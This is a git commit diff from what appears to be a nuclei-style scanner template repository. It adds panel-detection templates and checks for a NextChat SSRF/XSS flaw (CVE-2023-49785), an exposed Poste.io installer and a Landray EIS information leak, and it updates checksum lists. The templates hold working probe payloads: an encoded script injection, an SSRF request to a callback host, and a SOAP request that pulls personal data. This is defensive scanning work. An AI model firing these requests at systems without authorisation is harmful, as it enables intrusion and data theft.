Merge branch 'main' into patch-11

patch-1
Dhiyaneshwaran 2024-03-14 15:00:47 +05:30 committed by GitHub
commit b5bedb9ee3
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
18 changed files with 347 additions and 21 deletions

View File

@ -3,6 +3,14 @@ on:
push:
paths:
- '.new-additions'
- 'http/cves/2023/CVE-2023-49785.yaml'
- 'http/exposed-panels/emqx-panel.yaml'
- 'http/exposed-panels/neocase-hrportal-panel.yaml'
- 'http/exposed-panels/osnexus-panel.yaml'
- 'http/exposed-panels/posteio-admin-panel.yaml'
- 'http/exposed-panels/skeepers-panel.yaml'
- 'http/misconfiguration/installer/posteio-installer.yaml'
- 'http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml'
workflow_dispatch:
jobs:
triggerRemoteWorkflow:

View File

@ -0,0 +1,8 @@
http/cves/2023/CVE-2023-49785.yaml
http/exposed-panels/emqx-panel.yaml
http/exposed-panels/neocase-hrportal-panel.yaml
http/exposed-panels/osnexus-panel.yaml
http/exposed-panels/posteio-admin-panel.yaml
http/exposed-panels/skeepers-panel.yaml
http/misconfiguration/installer/posteio-installer.yaml
http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml

View File

@ -20,11 +20,11 @@
}
},
{
"author": "Dhiyaneshwaran",
"author": "DhiyaneshDk",
"links": {
"github": "https://github.com/DhiyaneshGeek",
"twitter": "https://twitter.com/DhiyaneshDK",
"linkedin": "https://www.linkedin.com/in/dhiyaneshwaran-b-27947a131/",
"linkedin": "https://www.linkedin.com/in/dhiyaneshwaran-bala/",
"website": "https://dhiyaneshgeek.github.io/",
"email": ""
}
@ -1398,4 +1398,4 @@
"email": ""
}
}
]
]

View File

@ -1,4 +1,4 @@
id: "CVE-2017-12617"
id: CVE-2017-12617
info:
name: Apache Tomcat - Remote Code Execution
@ -53,4 +53,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100cbd29bd1af92fbc3c9481f0e1544226df9ea0aa498b46095264c1933ae25388702207fa25ebb999a6d685fa667ecad2e5a2429e2952c5e53c06b9708169bfa8343f6:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100b9a63811f0cd0b53a30ddc0f315604f0a150d100126e214c6877ea5af0338974022016750fc20517e9bb5cd929abae7efefcc8ded3ed8f8f258672aafafd7645c867:922c64590222798bb761d5b6d8e72950

View File

@ -1,4 +1,4 @@
id: 'CVE-2019-17574'
id: CVE-2019-17574
info:
name: Popup-Maker < 1.8.12 - Broken Authentication
@ -58,4 +58,4 @@ http:
part: body_2
words:
- 'CVE-2019-17574'
# digest: 4a0a00473045022100fc87d15544ee76e3b494d5198dda732a83255b2867feca7d38b1eac6c0e221a202202c0f58c4848537e07958db94c0c5476eceb5ed97645991549c212e0c90d7a0ab:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502201cb7a532725f7804448ffc27f5f766edf3676e258b055224261a99d5047c48880221008ee525f52b9b04dc5b281d401e426a6c3519187ae7fa418713b6b6135c6ddc48:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,43 @@
id: CVE-2023-49785
info:
name: ChatGPT-Next-Web - SSRF/XSS
author: high
severity: critical
description: |
Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web
remediation: |
Do not expose to the Internet
reference:
- https://www.horizon3.ai/attack-research/attack-blogs/nextchat-an-ai-chatbot-that-lets-you-talk-to-anyone-you-want-to/
- https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2023-49785
metadata:
max-request: 1
shodan-query: title:NextChat,"ChatGPT Next Web"
verified: true
tags: cve,cve2023,ssrf,xss,chatgpt,nextchat
http:
- method: GET
path:
- "{{BaseURL}}/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23"
- "{{BaseURL}}/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23"
matchers-condition: or
matchers:
- type: dsl
dsl:
- contains(body_1, "<script>alert(document.domain)</script>")
- contains(header_1, "text/html")
condition: and
- type: dsl
dsl:
- contains(header_2,'X-Interactsh-Version')
- contains(interactsh_protocol_2,'dns')
condition: and
# digest: 4a0a004730450221009aef418a20ff3bbf0b2513919aab16c79ba3087163439fa0ec09b831204a3c2c02200b452345c9bd6f83f61372ddadd5b957e5775bb5e66f5008015794bb629da5a0:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,35 @@
id: emqx-panel
info:
name: EMQX Login Panel - Detect
author: righettod
severity: info
description: |
EMQX login panel was detected.
reference:
- https://www.emqx.io/
metadata:
max-request: 1
verified: true
shodan-query: http.title:"EMQX Dashboard"
tags: panel,emqx,login,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(to_lower(body), "<title>emqx dashboard", "emqx-dashboard")'
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- 'but\s+(emqx\-dashboard[0-9a-z\-]+)'
# digest: 490a00463044022050a31009b4c346da78b99a5700dec5a3aee3121d2a8c3de7a77ea1ec1789fc6302206be21494de96fd3a6af2d4b84e65c003f392ff2f09411d3362558dbc3a87c1cf:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,35 @@
id: neocase-hrportal-panel
info:
name: Neocase HR Portal Login Panel - Detect
author: righettod
severity: info
description: |
Neocase HR Portal login panel was detected.
reference:
- https://www.neocasesoftware.com/neocase-hr-solution/
- https://www.neocasesoftware.com/self-service-portal-module/
metadata:
max-request: 1
verified: true
tags: panel,neocase,login,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(to_lower(body), "neocase") && contains(to_lower(body), "hr portal") && contains(to_lower(body), "login")'
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- 'name="version"\s+content="([0-9\.]+)"'
# digest: 490a00463044022063b854c8360548fdb18b9d6aece92a46855ab572e2b5b91e4687bf427454d426022018b412a2e6cee376d6c148b7edf79b2c3b5ba696d9ef7c2702b05c3a2bc42c15:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,32 @@
id: osnexus-panel
info:
name: OSNEXUS QuantaStor Manager Panel - Detect
author: Charles D.
severity: info
description: |
OSNEXUS QuantaStor Manager login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
metadata:
max-request: 1
shodan-query: http.title:"OSNEXUS QuantaStor Manager"
tags: panel,osnexus,login
http:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- '<title>OSNEXUS QuantaStor Manager</title>'
- type: status
status:
- 200
# digest: 4a0a0047304502204a4d537d4202e85cc1578848dcb7002889c47e6aa4424d40f719b5840c540970022100ce8c32eeded6eee1ae3ea55dc8c66fad9722b137927d4c91ed33317e36c77ab8:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,31 @@
id: posteio-admin-panel
info:
name: Poste.io Admin Panel - Detect
author: ritikchaddha
severity: info
description: Poste.io login panel was detected.
metadata:
verified: true
max-request: 1
shodan-query: title:"Administration login" html:"poste<span"
tags: panel,poste,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/admin/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "poste<span"
- "Administration login"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100b55115aadc034c27bec7b66d3d93be3b401c7bc6daa6af8838f8964b706c981b02205bd21f3d5288e64fc02fcae5a782dfa5ebb3171807164a8bb7686b7eb4ccbf8c:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,38 @@
id: skeepers-panel
info:
name: Skeepers Login Panel - Detect
author: righettod
severity: info
description: |
Skeepers login panel was detected.
reference:
- https://skeepers.io
metadata:
max-request: 1
shodan-query: http.title:"Skeepers"
verified: true
tags: panel,skeepers,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/backend/login"
- "{{BaseURL}}"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(to_lower(body), "skeepers") && contains(to_lower(body), "login")'
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- 'Version\s+([0-9\.]+)\s+-'
# digest: 4a0a0047304502200ca76db0da6d74347c070b125f56df8b4f77883d31f40613e98b60d135392fec022100dcb459ada989ec123d684c569446608375e0ec861b12f5e948c86425d3f16163:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,31 @@
id: posteio-installer
info:
name: First Poste.io Configuration Installation Wizard
author: ritikchaddha
severity: high
description: Poste.io is susceptible to the Installation page exposure due to misconfiguration.
metadata:
verified: true
max-request: 1
shodan-query: title:"Initial server configuration"
tags: misconfig,exposure,install,poste
http:
- method: GET
path:
- "{{BaseURL}}/admin/install/server"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Initial server configuration"
- "Generate</button>"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100ec992f587d9499eeb4be41d1c62854d67328d45ad592cc85aa83adc854d0edd1022100a90a504589122cce6597be2e4bfdb196059a3d2b62773f1e6753a66a590eb8a3:922c64590222798bb761d5b6d8e72950

View File

@ -13,7 +13,7 @@ info:
vendor: esri
product: arcgis_engine
max-request: 1
tags: api,arcgis,cms,panel
tags: api,arcgis,cms,tech
http:
- method: GET
@ -29,4 +29,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100bc28eda1d34dcd942934ba5ab04ad25d2eba9479cd3e92c603d48c537a64635f022100c44519f2fb25d6c5b213a2122027fe1b9c4890f9f89fa097a692ed8bfd0db554:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100d0dfaa2a609b442e0b61ebd91c64ebe05e2fa989b1154afa43d76a2fb5cc072c0221008972cfb5a27670d3bfe05f475a5795b2c438d092a5585affa2a814714b1a4dd9:922c64590222798bb761d5b6d8e72950

View File

@ -13,7 +13,7 @@ info:
verified: true
max-request: 1
shodan-query: title:"ArcGIS"
tags: panel,arcgis,tokens,detect
tags: tech,arcgis,tokens,detect
http:
- method: GET
@ -30,4 +30,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100b6d840323a0d574071a975af0cb92521ac326152f25e5a0d52dd26405972929e022060cdfd72a18f8c2a474b206921541690828411be146c332d27b5c9e20e610064:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022064d73cdabe31276ef1cd2782d6906a8a7d2de90f8689fef69e29b855c98752df022100c07126b160bf84f7d071540bccecf623c5178cbc43ac1d87a7dac1cfc36f05d7:922c64590222798bb761d5b6d8e72950

View File

@ -2669,8 +2669,13 @@ http:
dsl:
- "status_code==200 && (\"557327884\" == mmh3(base64_py(body)))"
- type: dsl
name: "FileCatalyst"
dsl:
- "status_code==200 && (\"-1599943282\" == mmh3(base64_py(body)))"
extractors:
- type: dsl
dsl:
- 'mmh3(base64_py(body))'
# digest: 4a0a004730450220427edfee32645dec95891fe6e1b132c390f7eb122d6e80cd7727e2b1ef4bd822022100fc34f567cc72b46baa3e0b6f0d22dae4b44fd94ca61ce0305f764b1cc5f45f65:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202089a599cea657f48256bc500a69ca2c1fe47d64a39e4c4bccc59a4d0932b869022100a72b7fbe78fea135d9b8e2a8527ee876ef80c69856bb63cee318cd4ec8249fd9:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,52 @@
id: landray-eis-ws-infoleak
info:
name: Landray EIS WS_getAllInfos - Information Disclosure
author: Fur1na
severity: high
description: |
Landray EIS WS_getAllInfos interface suffers from a sensitive information disclosure vulnerability.
reference:
- https://mp.weixin.qq.com/s/CTLyriSSF-nQ8SUFv4RX0A
- https://github.com/akyosk/pocman/blob/main/cve/Lanling/Lanling_Info.py
metadata:
verified: true
max-request: 1
zoomeye-query: app:"蓝凌EIS智慧协同平台"
fofa-query: app="Landray-EIS智慧协同平台"
tags: landray,eis,info-leak
http:
- raw:
- |
POST /WS/Basic/Basic.asmx HTTP/1.1
Content-Type: text/xml
Host: {{Hostname}}
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:WS_getAllInfos/>
</soapenv:Body>
</soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<?xml"
- "WS_getAllInfosResponse"
- "CELL_PHONE_NUMBER"
- "UNID"
condition: and
- type: word
part: header
words:
- "Content-Type: text/xml"
- type: status
status:
- 200
# digest: 4a0a00473045022045057dbbdd5d66da4c8cc71a9191eae65366cde889167a832e78115c3de623d1022100eda04badb21ee1e234cc4f0e8e2ad2f0eb10ab90908a84eb836f77c5861aca9f:922c64590222798bb761d5b6d8e72950

View File

@ -31,4 +31,4 @@ tcp:
- type: binary
binary:
- "300c02010161070a010004000400"
# digest: 490a00463044022065fc3ae9655bd3fa9809177c5dc532f001ee07cb1803042704aeaafe3b25d23d02207980ab027262f50593e10342470ce0c7970eae6361ea8eb942ce1ed81793a9cf:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502203ae514bebca36612d0288dad8a182a1fd793c757bf61e5959d58cc3c1b39f2da022100bac973539f203619beb4769bd20d9ae79aadaad4717e858e1f2c0010d4fa3b17:922c64590222798bb761d5b6d8e72950

View File

@ -104,7 +104,7 @@ config/osint.yml:683fe1e52716d054760d707dbc123f5e09de5418
config/pentest.yml:c7b04a39e2efaf1a5f627da9b49ecf714d927f0e
config/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8
config/recommended.yml:eb4d0cb29634218f0279692e8c59fa1906d7148c
contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9
contributors.json:7aceb02f36b26022058d0a11cd8517df6aae4445
cves.json:51d8ac58d8ffdf6cfd4660d3e19373bb08bb6605
cves.json-checksum.txt:fdca644f563bcfe217c57881fc5991db50a942e4
dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4
@ -1150,7 +1150,7 @@ http/cves/2017/CVE-2017-12544.yaml:0f94faf6b93cdf714a9111af0c2c8b942bcb1e55
http/cves/2017/CVE-2017-12583.yaml:2498cda75aa6561312f290a10efd54cb22350a58
http/cves/2017/CVE-2017-12611.yaml:92b9fa46b705313c0802c2b2052522c252e38c4a
http/cves/2017/CVE-2017-12615.yaml:615979d1bfaa3cddb4349487ed06c5c030261854
http/cves/2017/CVE-2017-12617.yaml:c5917c31aa3e2bb02cc828cee3f3e4ec14b528db
http/cves/2017/CVE-2017-12617.yaml:e9ac390608ee6bbe4f489199ea9b9e952386ae97
http/cves/2017/CVE-2017-12629.yaml:4fc452dac455444c30058520b2c8f11b00b3ca35
http/cves/2017/CVE-2017-12635.yaml:72b59847cec4dce55325daa4fe2e9066149ff85f
http/cves/2017/CVE-2017-12637.yaml:a1e648e4850b39d58ce028d539a89a57fe99e23c
@ -1478,7 +1478,7 @@ http/cves/2019/CVE-2019-17503.yaml:6701aacab1ee79d24acd3cbd1497fb50399ad671
http/cves/2019/CVE-2019-17506.yaml:b0db1a0dd94538fede1011a56f7f41708dc89d6d
http/cves/2019/CVE-2019-17538.yaml:6ee1fff5d758343db188de36fd0daf2c451c6c42
http/cves/2019/CVE-2019-17558.yaml:f20a87b60a1601a2db4f365919c9cb223a362ded
http/cves/2019/CVE-2019-17574.yaml:ca85f1c6a85b6ab43d3318013c3cc564472ab6eb
http/cves/2019/CVE-2019-17574.yaml:28c75b3f47abe985eb68233b8d951f740f3d0986
http/cves/2019/CVE-2019-17662.yaml:1708f047a247cf166c83a1b9dba6134aa239b03c
http/cves/2019/CVE-2019-1821.yaml:f6e0593b4f1ae0d169d2399b77e3e673808aa6dd
http/cves/2019/CVE-2019-18371.yaml:7b787967a5b266feccbe4583a765ae00f2967538
@ -3018,6 +3018,7 @@ http/cves/2023/CVE-2023-49070.yaml:b1c9390c84ce4e80fa1d272d413fc2c85b618e89
http/cves/2023/CVE-2023-49103.yaml:8eab68a4f41466e6d9bef692647cc9e86969bd49
http/cves/2023/CVE-2023-4966.yaml:0844e850070ee1b9917d6a5ff52aa95774d77bfa
http/cves/2023/CVE-2023-4974.yaml:d7a5386c5971e13babc28e9f346991ef0e82fba2
http/cves/2023/CVE-2023-49785.yaml:94217b2b02a0b523b66a9fc8f05e8582230bc1cf
http/cves/2023/CVE-2023-50290.yaml:a4a677f475627e96520f0f5e5bde5d3724edb850
http/cves/2023/CVE-2023-5074.yaml:340095d00333b6b3d7dece3033a3cb41dd04d2f6
http/cves/2023/CVE-2023-5089.yaml:036508049150a9b776427bbdc000d13423a44932
@ -3307,9 +3308,7 @@ http/exposed-panels/aptus-panel.yaml:0d1075ba7146c52556285b37546d7d865fd8f75f
http/exposed-panels/aqua-enterprise-panel.yaml:e2a84a82ce62f950c2df4f97eaae5e08b6cbbc95
http/exposed-panels/arangodb-web-Interface.yaml:11794975d0f0e8f2033a303acf3fa86c1f6ea87c
http/exposed-panels/arcgis/arcgis-panel.yaml:a28653c7d4073de6046246a24a7fb0eb751675c4
http/exposed-panels/arcgis/arcgis-rest-api.yaml:1b7063bac7d92661d4d72f9f72af73fd87380e30
http/exposed-panels/arcgis/arcgis-services.yaml:8893e98a5ae90070d0eba0f1ec9027a226d79b28
http/exposed-panels/arcgis/arcgis-tokens.yaml:17a37f21b1333150e7a4cb51557d0b8f9a125919
http/exposed-panels/archibus-webcentral-panel.yaml:aa640b26a2da57e1d8d676ec7b3c1286ba519cfb
http/exposed-panels/arcserve-panel.yaml:dcc4ee8eb465c153ba612290607c8dc0dd2107d4
http/exposed-panels/argocd-login.yaml:d5d4e5e2aa719d7c17487622aa765bafaf48f6ef
@ -3520,6 +3519,7 @@ http/exposed-panels/elemiz-network-manager.yaml:483e8167cf7de6a98dfd3ae29c0a7b3f
http/exposed-panels/emby-panel.yaml:e57a8d79f1854b091844e7b5ad78ea267404dc6b
http/exposed-panels/emerson-power-panel.yaml:2e9666ed7c5b27a1e11f2d15143f1a364ff147e3
http/exposed-panels/emessage-panel.yaml:244cc74a7e125d03db25d8444111fa2362c834fe
http/exposed-panels/emqx-panel.yaml:6143c7c6d1308c4855e873451a364644c1a3fa2d
http/exposed-panels/ems-login-panel.yaml:e2dac4ee78234a667c4569ee9b00e8eada67840f
http/exposed-panels/ems-webclient-panel.yaml:617f0768ae7e741eee2edd0b7ee980bc36a2030f
http/exposed-panels/entrust-identityguard.yaml:98b051b5b1e7974e5e7c4a26fd99d2f121f6cc16
@ -3827,6 +3827,7 @@ http/exposed-panels/ncentral-panel.yaml:a9779092e45925324db2747407863c37cdc2a766
http/exposed-panels/nconf-panel.yaml:4aa64fa95de305ec8024028e8fa1a785614f7b9d
http/exposed-panels/neo4j-browser.yaml:ccc4330698705c06653b6061c500847fc767fadf
http/exposed-panels/neobox-panel.yaml:779ab03c3cbaa821fc910085402eabe0f3d85b82
http/exposed-panels/neocase-hrportal-panel.yaml:b8c1741a7a1823618e0d00255b1344ae7faaf45e
http/exposed-panels/neos-panel.yaml:c8e197b8b3459621b2e305e92c9800d75c5498d6
http/exposed-panels/nessus-panel.yaml:aa32daccb1a85e93d2bf67911ab103b11b1fe88f
http/exposed-panels/netdata-dashboard-detected.yaml:bebe472e018a926dc6d756a856a7432443127914
@ -3907,6 +3908,7 @@ http/exposed-panels/oracle-opera-login.yaml:16978aa62e69011c6be44ba271549f9f1fd3
http/exposed-panels/oracle-people-enterprise.yaml:47603f5bbae5afa809fe77bc8e93432d2b051de2
http/exposed-panels/oracle-people-sign-in.yaml:834f1817ec42bc67fd97ba87f6d142a1c27dd0de
http/exposed-panels/orchid-vms-panel.yaml:83bdda5b8801264dbbf662d318fdfc621088e550
http/exposed-panels/osnexus-panel.yaml:9fa8e9db454e2e49613c27d1557dc217817d3bc4
http/exposed-panels/osticket/osticket-install.yaml:712f11ffff56b51445d19b4e4872617e5971a136
http/exposed-panels/osticket-panel.yaml:9b869f83981786d4710c1954423be42775421582
http/exposed-panels/otobo-panel.yaml:8889e51ea16ca6565b7fe303e841cdf757bbe668
@ -3948,6 +3950,7 @@ http/exposed-panels/plesk-onyx-login.yaml:887fc8d4c7bb815b42ed5faa8a4978e29aa467
http/exposed-panels/polycom-admin-detect.yaml:6ea4fcf23a6a45b4cf92aaa723105a58ba61c3ba
http/exposed-panels/polycom-login.yaml:de5066bed1a10457dd95fb5206d318ef32ce55ff
http/exposed-panels/portainer-panel.yaml:21c25d3bb1881bb83ce3eff7c4361b24ff238a48
http/exposed-panels/posteio-admin-panel.yaml:dafe7d55e1d3219f31bc6bf7d3dba9a4279e4144
http/exposed-panels/posthog-admin-panel.yaml:3819224e2a073fb5544a9a1af3f068418ebd1808
http/exposed-panels/powercom-network-manager.yaml:12a31899a7fed8fd88a195f22ac67d8a34c551b1
http/exposed-panels/powerjob-panel.yaml:37bc888a708fd3cb65d9fe6a39aaf5083d70a9cc
@ -4071,6 +4074,7 @@ http/exposed-panels/sitecore-login-panel.yaml:b413b6dede85aa42c9694f2431e3602e32
http/exposed-panels/sitecore-login.yaml:8afca9554b0a60ab605de3be798d630d221cac03
http/exposed-panels/sitefinity-login.yaml:5e48b42e3c29325601761639d75551f18935d146
http/exposed-panels/siteomat-login.yaml:8515fbc4f21461deccf62e6476916bfde6ffc5b5
http/exposed-panels/skeepers-panel.yaml:d05c6b6e1579cac2497e1955f6b009884bf22d6b
http/exposed-panels/skycaiji-admin-panel.yaml:361c2ff751869e4b694246e113ceaf3e0ca57b46
http/exposed-panels/slocum-login.yaml:882558fc76eedef7ba2f13a9011a298046d85fe5
http/exposed-panels/smartping-dashboard.yaml:95eec001a41f2fe0c66ebfc58e0560cd9755e5cd
@ -5143,6 +5147,7 @@ http/misconfiguration/installer/phpgedview-installer.yaml:c3abf51106828355409764
http/misconfiguration/installer/phpwind-installer.yaml:382bd97db9268ea3922f6ea937ef2d07a77c0cf0
http/misconfiguration/installer/piwik-installer.yaml:13b6e4cc5e4a106ac91c0f984089a3465a67af49
http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40b3f1c065e91
http/misconfiguration/installer/posteio-installer.yaml:d4662ebf401e1c2128570f674b63ccf25970599b
http/misconfiguration/installer/prestashop-installer.yaml:5011384078f8708b8ec90caa52c299ecb922dea5
http/misconfiguration/installer/processwire-installer.yaml:77810f7d222228fb1c1afb38560135f4b7718d24
http/misconfiguration/installer/redash-installer.yaml:1087870f7e1826761d0ecbfbbc60528e43e028e0
@ -6290,6 +6295,8 @@ http/technologies/apollo-server-detect.yaml:44245d09c9ad3e3fbca5d699041ac2bd23d3
http/technologies/appcms-detect.yaml:1e4a5703053e47d171007ea981900427a88bfab6
http/technologies/apple-httpserver.yaml:17b86c19f29316954819f862cc7d1e371890f4cd
http/technologies/aqua-enterprise-detect.yaml:50f08ae63f0b5b33a949ac9f0993afd4b05c589d
http/technologies/arcgis-rest-api.yaml:adb458bb4c55b7f099462c1183fab7ea0b736d7d
http/technologies/arcgis-tokens.yaml:e8cb9ddc0610cb5b7d0ddb1bc9ae8c82e99ba69d
http/technologies/artica-web-proxy-detect.yaml:8e2fe60b79816e54a4c63ab51115c99963ffefc2
http/technologies/atlassian-connect-descriptor.yaml:5135540c39e64c76e7eedb29fe59661fc878a676
http/technologies/autobahn-python-detect.yaml:bd44751b34cd25f8141cbed27c22f6e83707ccf4
@ -6384,7 +6391,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872
http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1
http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac
http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a
http/technologies/favicon-detect.yaml:8afeb0653fa829136cd208e25ac05e6933ddfd11
http/technologies/favicon-detect.yaml:10cb70dd76719f7850249d0b9184054205fd47f5
http/technologies/fingerprinthub-web-fingerprints.yaml:27e666a6c70080629b106d8a7549a69b04e80292
http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2
http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9
@ -7244,6 +7251,7 @@ http/vulnerabilities/jorani/jorani-benjamin-xss.yaml:4709c5754730eb3ce11e618fa9e
http/vulnerabilities/juniper/junos-xss.yaml:2fb77ffeeb6be6b060134ad475574168fbc7dacb
http/vulnerabilities/jupyter-notebook-rce.yaml:70bde4f2a81cfcd8fa84033dffa5391ecc67f5cf
http/vulnerabilities/kkfileview-ssrf.yaml:6c5e8dee68280e2773268838eb779266a0e2ceb5
http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml:7e5d0ddc655a0b4a037da8df12aa63509a77da1f
http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml:55ae9bebeb50e27d2b5400649d133093616a5427
http/vulnerabilities/landray/landray-oa-treexml-rce.yaml:bc66dd3fd8c3965a0217aefe95ea84074f5fd7f6
http/vulnerabilities/laravel/laravel-ignition-xss.yaml:c022357b49e3f882abd8689da81a7b85dc1e27a1
@ -7986,7 +7994,7 @@ network/cves/2022/CVE-2022-31793.yaml:d53c4361e167a401f76f3069a2cd985a612c955c
network/cves/2023/CVE-2023-33246.yaml:3db23ab1b222f81ce0a08b75c23bc5ecae85b9dd
network/default-login/ftp-anonymous-login.yaml:da3402a791529b5521e14fceafe0f0084bb4c9d2
network/default-login/ftp-weak-credentials.yaml:c0cf4a3227435e117de922b08ad77edebf6304a5
network/default-login/ldap-anonymous-login.yaml:257f564e889574eb3e0e8cc460038e1f21c34329
network/default-login/ldap-anonymous-login.yaml:1d0d2f3485fec11106c15b75166448f9ab047eec
network/detection/activemq-openwire-transport-detect.yaml:da59945499ac1f46d9ac606f27d98dd8e1e493d9
network/detection/apache-activemq-detect.yaml:afd8fba85587220ae91e9120c3f7455529be8b5e
network/detection/aws-sftp-detect.yaml:4c67b37ede734d66486377b851223abb638d1f78
@ -8125,7 +8133,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
templates-checksum.txt:02dfa0c3b5dc35bd1649dd97e286758daf9c3371
templates-checksum.txt:255cf5ae89f4a3de23a929d72721f3554d5dd9f3
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4